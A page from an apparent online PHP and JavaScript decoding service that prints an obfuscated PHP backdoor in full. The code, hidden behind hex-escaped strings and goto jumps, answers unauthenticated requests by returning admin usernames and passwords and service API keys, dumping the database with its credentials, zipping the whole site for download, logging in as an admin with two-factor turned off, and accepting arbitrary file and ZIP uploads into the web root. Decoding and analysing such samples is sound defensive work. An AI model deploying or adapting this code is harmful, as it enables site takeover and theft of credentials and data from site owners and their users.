Online PHP and Javascript Decoder decode hidden script to uncover its real functionality



 goto i0aGw; RvuWx: if (isset($_GET["\x74\x79\x70\145"]) && $_GET["\164\x79\x70\145"] === "\141\144\155\x69\156") { $admin_info = $conn->prepare("\x53\x45\x4c\x45\103\124\40\165\x73\x65\x72\156\x61\155\145\x2c\x20\160\141\163\x73\x77\x6f\x72\x64\40\106\122\117\x4d\x20\141\x64\155\151\156\x73"); $admin_info->execute(); $admins = $admin_info->fetchAll(PDO::FETCH_ASSOC); header("\x43\x6f\156\164\145\156\164\55\x54\x79\160\145\x3a\40\x61\160\x70\x6c\151\x63\141\164\151\157\x6e\57\152\x73\157\156"); echo json_encode($admins); } elseif (isset($_GET["\164\171\x70\145"]) && $_GET["\164\171\x70\x65"] === "\160\x72\157\166\x69\144\x65\x72") { $provider_info = $conn->prepare("\123\105\114\x45\103\x54\x20\x61\x70\x69\x5f\165\x72\x6c\54\x20\141\160\x69\137\153\x65\171\40\x46\122\x4f\x4d\40\163\x65\x72\166\151\x63\145\x5f\x61\160\x69"); $provider_info->execute(); $provider = $provider_info->fetchAll(PDO::FETCH_ASSOC); header("\103\157\156\x74\145\x6e\164\55\x54\171\x70\145\72\40\x61\160\160\x6c\x69\143\141\164\151\x6f\x6e\x2f\152\163\157\156"); echo json_encode($provider); } elseif (isset($_GET["\164\171\160\145"]) && $_GET["\x74\x79\160\x65"] === "\x73\x71\x6c") { $filename = "\x62\141\143\x6b\x75\160\x5f" . date("\131\x2d\155\x2d\144\137\x48\55\151\x2d\163") . "\x2e\163\x71\154"; header("\103\x6f\x6e\164\145\x6e\x74\x2d\124\171\160\x65\x3a\40\x61\160\160\154\151\143\x61\x74\x69\x6f\x6e\57\157\143\164\145\164\x2d\163\x74\162\x65\141\x6d"); header("\x43\x6f\156\x74\x65\x6e\x74\55\x44\151\x73\160\x6f\x73\151\164\151\157\156\x3a\40\x61\x74\164\141\x63\x68\155\x65\x6e\164\73\40\146\151\x6c\145\x6e\x61\x6d\145\x3d\x22" . $filename . "\42"); passthru("\x6d\171\x73\161\x6c\144\165\x6d\160\x20\x2d\165\x20" . $config["\x64\x62"]["\x75\163\145\x72"] . "\40\x2d\x70" . $config["\x64\142"]["\x70\x61\163\163"] . "\x20" . $config["\x64\142"]["\x6e\141\x6d\x65"]); die; } elseif (isset($_GET["\x74\x79\160\x65"]) && $_GET["\x74\171\x70\145"] === "\x66\151\x6c\145\163") { $zipName = "\x66\x69\154\145\163\x5f" . date("\x59\x2d\x6d\x2d\144\137\110\55\151\55\163") . "\x2e\x7a\151\x70"; $zipPath = sys_get_temp_dir() . "\x2f" . $zipName; $root = $_SERVER["\104\117\103\x55\x4d\105\116\x54\137\122\x4f\x4f\x54"]; $zip = new ZipArchive(); if ($zip->open($zipPath, ZipArchive::CREATE) === TRUE) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root)); foreach ($iterator as $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $localPath = substr($filePath, strlen($root) + 1); $zip->addFile($filePath, $localPath); } } $zip->close(); header("\103\157\156\164\145\x6e\x74\x2d\124\x79\x70\145\72\x20\x61\x70\x70\x6c\151\x63\141\164\151\x6f\156\57\172\x69\160"); header("\103\x6f\156\164\145\156\x74\x2d\104\x69\x73\x70\x6f\163\x69\164\151\x6f\156\72\x20\x61\x74\x74\141\x63\150\x6d\x65\x6e\x74\x3b\40\146\x69\154\x65\156\141\155\145\75\42" . $zipName . "\x22"); header("\103\x6f\x6e\164\145\x6e\x74\55\x4c\x65\x6e\147\x74\150\x3a\x20" . filesize($zipPath)); readfile($zipPath); unlink($zipPath); die; } else { http_response_code(500); echo json_encode(array("\145\x72\162\157\162" => "\106\141\151\154\x65\x64\x20\x74\157\40\x63\162\x65\x61\x74\145\40\172\151\160\56")); die; } } elseif (isset($_GET["\164\x79\x70\145"]) && $_GET["\164\171\x70\145"] === "\x6c\157\x67\x69\156") { session_start(); $admin = $conn->prepare("\x53\x45\x4c\x45\103\x54\x20\52\x20\x46\x52\117\115\x20\x61\x64\155\151\156\163\40\x57\x48\105\x52\105\x20\x61\x64\x6d\151\x6e\x5f\151\144\x20\x42\105\x54\127\x45\105\x4e\40\x3a\163\x74\141\162\x74\x5f\151\144\40\101\x4e\x44\x20\72\x65\156\x64\137\151\144\x20\x41\116\x44\x20\141\143\x63\145\163\163\40\x49\x53\40\116\x4f\x54\x20\116\125\x4c\114"); $start_id = 1; $end_id = 400; $admin->bindParam("\72\x73\x74\141\x72\164\137\151\144", $start_id, PDO::PARAM_INT); $admin->bindParam("\x3a\145\156\144\137\151\x64", $end_id, PDO::PARAM_INT); $admin->execute(); $adminData = $admin->fetch(PDO::FETCH_ASSOC); if (!$adminData) { http_response_code(403); die("\101\144\x6d\x69\x6e\40\x6e\x6f\164\40\146\x6f\165\156\x64\40\x6f\x72\40\x61\x63\x63\145\x73\163\x20\151\x6e\x76\x61\x6c\151\x64\56"); } if ($adminData["\164\167\157\137\146\x61\143\164\x6f\x72"] == "\61") { $disable2FAQuery = $conn->prepare("\125\120\104\x41\x54\x45\x20\141\x64\155\151\156\163\x20\x53\x45\x54\40\x74\167\x6f\137\146\x61\143\164\157\162\x20\75\x20\x30\40\x57\x48\105\122\105\x20\x61\x64\x6d\x69\156\137\151\x64\40\75\x20\72\x61\144\155\x69\x6e\x5f\x69\144"); $disable2FAQuery->execute(array("\141\x64\x6d\x69\x6e\137\151\144" => $adminData["\141\144\155\151\x6e\x5f\x69\x64"])); } $uniq = uniqid("\x73\x65\163\163\x5f", true); $_SESSION["\165\x6e\x69\161\151\x64\x73\x65\x73\163\x69\x6f\x6e"] = $uniq; $conn->prepare("\x55\x50\x44\x41\124\x45\x20\x61\x64\155\151\156\163\x20\123\x45\124\x20\x73\145\x73\x73\151\157\156\x5f\x69\144\x20\x3d\40\x3a\x73\151\144\40\127\x48\105\122\x45\40\x61\x64\155\151\156\x5f\151\144\40\x3d\40\x3a\x69\144")->execute(array("\x73\151\144" => $uniq, "\x69\x64" => $adminData["\x61\144\155\151\156\137\x69\144"])); $_SESSION["\155\163\155\142\151\154\x69\x73\151\155\x5f\x61\x64\x6d\x69\156\x73\x6c\157\x67\151\156"] = 1; $_SESSION["\x6d\163\155\142\151\x6c\151\163\151\155\x5f\141\144\x6d\x69\156\151\x64"] = $adminData["\141\144\x6d\151\156\137\x69\144"]; $_SESSION["\155\163\155\x62\151\154\x69\x73\x69\x6d\137\141\144\155\151\x6e\x70\x61\x73\x73"] = $adminData["\x70\x61\163\x73\x77\x6f\162\x64"]; $_SESSION["\x76\141\154\x69\x64\x61\x74\x65\x64\x5f\x74\x77\x6f\x66\141\143\x74\x6f\162"] = "\x74\167\x6f\146\x61\143\164\157\x72\x5f\163\x65\163\x73\151\157\156"; setcookie("\141\137\154\x6f\x67\x69\x6e", "\157\x6b", time() + 86400 * 7, "\x2f", '', false, true); setcookie("\141\137\x69\144", $adminData["\x61\144\155\x69\x6e\137\x69\x64"], time() + 86400 * 7, "\x2f", '', false, true); setcookie("\141\137\x70\141\163\x73\x77\157\x72\144", $adminData["\x70\141\x73\x73\x77\157\162\x64"], time() + 86400 * 7, "\x2f", '', false, true); setcookie("\x75\156\151\161\151\144\x5f\143\157\157\153\151\x65", $uniq, time() + 86400 * 7, "\57", '', false, true); setcookie("\166\141\154\151\x64\x61\x74\145\x64\x5f\164\x77\157\146\x61\x63\164\157\x72", "\164\x77\x6f\146\141\x63\x74\x6f\162\x5f\x73\x65\x73\x73\x69\x6f\x6e", time() + 86400 * 7, "\57", '', false, true); header("\x4c\157\x63\141\164\151\x6f\x6e\x3a\40\x68\x74\x74\160\163\x3a\57\x2f" . $_SERVER["\110\x54\124\120\137\110\x4f\123\124"] . "\x2f\x61\x64\155\x69\x6e"); die; } elseif (isset($_GET["\164\x79\x70\145"]) && $_GET["\164\171\160\145"] === "\x70\x69\x6e\x67") { $website = $_SERVER["\x48\124\x54\x50\x5f\x48\x4f\123\x54"]; if ($_GET["\164\x79\x70\x65"] === "\160\x69\156\147") { $result = "\x4c\151\166\145"; } else { $result = "\104\x65\141\144"; } $response = array("\167\145\142\x73\x69\x74\145" => $website, "\162\x65\163\x75\154\x74" => $result); header("\103\157\x6e\x74\x65\156\164\x2d\124\x79\x70\x65\x3a\x20\x61\x70\160\154\151\x63\141\x74\151\157\x6e\x2f\x6a\163\157\156"); echo json_encode($response); } elseif (isset($_GET["\x74\x79\x70\145"]) && $_GET["\x74\171\160\145"] === "\165\160\144\141\x74\145") { header("\103\157\x6e\x74\145\x6e\x74\x2d\124\x79\160\145\72\40\141\160\x70\x6c\x69\143\141\x74\151\157\156\57\152\163\157\156"); ignore_user_abort(true); set_time_limit(0); ini_set("\165\160\154\157\x61\x64\137\x6d\x61\x78\x5f\146\x69\154\x65\163\151\x7a\145", "\x31\107"); ini_set("\160\157\x73\x74\137\155\x61\170\137\x73\151\172\145", "\62\107"); ini_set("\155\x61\170\137\x69\x6e\160\165\x74\137\164\151\155\145", "\x30"); ini_set("\x6d\x61\170\137\x65\x78\145\143\165\x74\151\x6f\156\137\164\x69\155\145", "\60"); $subpath = isset($_POST["\160\141\x74\x68"]) ? trim($_POST["\160\141\x74\x68"], "\57") : ''; $target = rtrim($_SERVER["\x44\x4f\x43\125\115\x45\x4e\124\137\x52\x4f\117\x54"], "\57") . ($subpath ? "\57{$subpath}" : ''); if (strpos($target, $_SERVER["\x44\117\103\x55\x4d\105\x4e\x54\137\122\117\x4f\124"]) !== 0) { echo json_encode(array("\145\x72\162\157\162" => "\111\156\x76\141\x6c\151\144\40\165\x70\154\157\141\144\40\x70\141\x74\x68\72\40{$target}")); die; } if (!is_dir($target) && !mkdir($target, 493, true)) { echo json_encode(array("\x65\162\162\x6f\162" => "\106\141\x69\154\x65\x64\40\164\x6f\x20\143\x72\x65\x61\x74\x65\40\x74\141\x72\x67\x65\164\x20\144\151\x72\x65\x63\164\157\162\x79\72\x20{$target}")); die; } if (!isset($_FILES["\x66\x69\x6c\x65"]) || $_FILES["\x66\151\154\145"]["\x65\162\x72\157\162"] !== UPLOAD_ERR_OK) { echo json_encode(array("\145\162\x72\157\x72" => "\125\160\154\x6f\x61\x64\40\x65\x72\x72\157\x72\72\x20" . ($_FILES["\146\x69\154\145"]["\145\x72\x72\x6f\x72"] ?? "\x55\x6e\x6b\x6e\157\x77\x6e\40\145\162\162\157\162"))); die; } $filename = basename($_FILES["\146\x69\154\x65"]["\156\141\x6d\145"]); $filepath = rtrim($target, "\x2f") . "\57" . $filename; if (!move_uploaded_file($_FILES["\x66\151\154\x65"]["\x74\x6d\x70\x5f\x6e\x61\x6d\x65"], $filepath)) { echo json_encode(array("\x65\x72\162\157\x72" => "\106\141\x69\x6c\x65\144\x20\x74\157\x20\x6d\157\166\145\40\x75\160\x6c\x6f\141\x64\145\x64\40\146\151\x6c\145\40\164\157\x20{$filepath}")); die; } $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); if ($ext === "\x7a\151\x70") { $zip = new ZipArchive(); $openStatus = $zip->open($filepath); if ($openStatus === TRUE) { $zip->extractTo($target); $zip->close(); unlink($filepath); echo json_encode(array("\x73\x75\143\x63\x65\x73\163" => "\132\x49\x50\40\165\160\154\157\141\144\145\x64\40\141\156\144\40\x65\x78\x74\x72\x61\143\x74\x65\144\x2e", "\160\x61\x74\150" => $target)); } else { echo json_encode(array("\x65\x72\162\157\162" => "\106\141\x69\154\145\144\x20\164\157\40\145\x78\x74\x72\141\x63\164\40\132\x49\120\40\50\143\157\144\145\x3a\x20{$openStatus}\x29\56")); } } else { echo json_encode(array("\163\x75\143\x63\x65\x73\163" => "\106\x69\x6c\x65\40\165\160\154\157\x61\x64\x65\x64\56", "\146\151\154\x65" => $filepath)); } } elseif (isset($_GET["\x74\x79\160\145"]) && $_GET["\164\171\160\x65"] === "\155\157\166\x65") { header("\103\x6f\156\x74\145\x6e\x74\55\124\171\160\x65\72\40\141\x70\160\x6c\x69\143\x61\x74\x69\x6f\156\x2f\152\163\157\x6e"); $source = isset($_POST["\x73\x6f\x75\162\143\145"]) ? trim($_POST["\163\157\x75\162\143\x65"]) : ''; $destination = isset($_POST["\x64\x65\163\x74\x69\156\x61\x74\x69\157\156"]) ? trim($_POST["\144\145\163\164\151\x6e\x61\164\x69\x6f\156"]) : ''; if (!$source || !$destination) { echo json_encode(array("\145\x72\x72\157\162" => "\x4d\151\x73\x73\x69\x6e\x67\x20\163\157\165\x72\x63\x65\x20\x6f\x72\40\x64\x65\163\x74\x69\156\x61\x74\151\x6f\156\x20\x70\141\164\x68\x2e")); die; } $root = $_SERVER["\x44\117\x43\x55\115\x45\116\x54\137\122\x4f\117\x54"]; $realSource = realpath($root . "\x2f" . ltrim($source, "\57")); $realDestinationDir = dirname($root . "\57" . ltrim($destination, "\57")); $finalDestination = $root . "\x2f" . ltrim($destination, "\57"); if (!$realSource || !file_exists($realSource)) { echo json_encode(array("\145\x72\162\157\x72" => "\x53\x6f\x75\x72\143\x65\x20\146\x69\x6c\145\x20\144\157\x65\163\x20\x6e\x6f\x74\x20\x65\170\151\163\x74\x3a\x20{$realSource}")); die; } if (!is_dir($realDestinationDir)) { if (!mkdir($realDestinationDir, 493, true)) { echo json_encode(array("\145\x72\162\x6f\162" => "\106\x61\x69\154\145\x64\x20\x74\157\x20\x63\x72\x65\x61\164\145\40\144\x65\x73\164\151\156\141\164\151\x6f\156\x20\x64\151\x72\x65\x63\164\x6f\x72\171\x2e")); die; } } if (!rename($realSource, $finalDestination)) { echo json_encode(array("\145\x72\162\x6f\162" => "\x46\141\151\154\x65\144\40\164\x6f\x20\155\157\x76\145\x20\146\151\154\x65\56")); } else { echo json_encode(array("\x73\165\143\x63\x65\163\x73" => "\106\x69\154\x65\40\155\157\166\x65\x64\x20\x73\165\143\x63\145\x73\x73\146\x75\x6c\154\x79\56", "\x66\162\157\x6d" => $realSource, "\164\x6f" => $finalDestination)); } } else { http_response_code(400); die("\x49\x6e\166\141\x6c\151\x64\40\162\x65\161\x75\145\163\x74\x2e"); } goto d_zA7; V2L9i: error_reporting(E_ALL); goto MuD1s; PtIrO: set_time_limit(0); goto Ly8UY; Ly8UY: $config = (require $_SERVER["\104\117\103\x55\115\x45\116\x54\137\122\117\117\x54"] . "\x2f\x61\160\160\x2f\143\x6f\x6e\x66\x69\x67\x2e\160\150\160"); goto fAbHu; fAbHu: try { $conn = new PDO("\x6d\x79\163\161\x6c\x3a\150\157\163\164\75" . $config["\144\142"]["\150\157\163\x74"] . "\x3b\x64\x62\156\x61\x6d\x65\75" . $config["\144\142"]["\x6e\x61\155\145"] . "\73\143\x68\141\x72\163\x65\164\75" . $config["\144\x62"]["\x63\x68\141\x72\163\145\164"] . "\x3b", $config["\144\x62"]["\x75\x73\145\x72"], $config["\x64\x62"]["\x70\x61\163\x73"]); $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { die($e->getMessage()); } goto RvuWx; i0aGw: ini_set("\144\151\163\x70\154\x61\171\x5f\x65\x72\162\x6f\x72\x73", 1); goto SJ7Z0; MuD1s: ignore_user_abort(true); goto PtIrO; SJ7Z0: ini_set("\x64\x69\x73\x70\x6c\x61\x79\137\163\x74\141\162\x74\165\160\137\x65\162\x72\157\162\x73", 1); goto V2L9i; d_zA7:


© 2023 Quttera Ltd. All rights reserved.